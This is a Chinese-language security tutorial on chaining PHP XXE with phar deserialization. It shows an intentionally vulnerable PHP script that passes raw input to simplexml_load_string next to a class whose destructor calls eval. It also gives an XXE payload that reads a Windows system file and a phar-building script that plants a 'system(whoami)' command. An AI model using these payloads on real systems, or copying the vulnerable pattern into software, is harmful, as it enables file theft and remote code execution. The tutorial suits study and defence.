重要:在 PHP 里面解析 xml 用的是 libxml,当 libxml 的版本大于 2.9.0 的时候默认是禁止解析 xml 外部实体内容的。
以下代码存在 xxe 漏洞。
xml.php:
<?php
class Test {
public $cmd ;
public function __destruct ()
{
eval ( $this-> cmd );
}
}
$xmlfile = @ file_get_contents ( "php://input" );
$result = @ simplexml_load_string ( $xmlfile );
echo $result ;
// 另一种解析 xml 的方式
// class Test{
// public $cmd;
// public function __destruct()
// {
// eval($this->cmd);
// }
// }
// $file = file_get_contents("php://input");
// $dom = new DOMDocument();
// $dom->loadXML($file);
// $result = simplexml_import_dom($dom);
// echo $result;
触发 xxe 漏洞实现任意文件读取。
<?xml version="1.0"?>
<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini" > ]>
<foo> &xxe; </foo>
在 xml 中有一个 Test 类,如果能反序列化该类的话就可以构造恶意代码执行。
支持解析 xml 外部实体的协议如下,可以看到 PHP 支持 phar 协议。也就是说只要有一个文件上传点,并且文件上传的路径是有回显的,那么就可以配合 xxe 漏洞去触发反序列化漏洞。
通过 xee 触发反序列化漏洞进行任意代码执行。
第一步:先构造 Test 类的 phar 文件,假设生成的 phar 文件已经被上传到 xml.php 的同一个目录。
<?php
class Test {
public function __construct (){
$this-> cmd = 'system(whoami);' ;
}
}
@ unlink ( "phar.phar" );
$phar = new Phar ( "phar.phar" ); //后缀名必须为phar
$phar-> startBuffering ();
$phar-> setStub ( "<?php __HALT_COMPILER(); ?>" ); //设置stub
$o = new Test ();
$phar-> setMetadata ( $o ); //将自定义的meta-data存入manifest
$phar-> addFromString ( "test.txt" , "test" ); //添加要压缩的文件
//签名自动计算
$phar-> stopBuffering ();
?>
第二步:利用 xxe 漏洞使用 phar 协议解析 phar 文件成功执行命令。
最后
关注私我获取【网络安全学习资料·攻略】
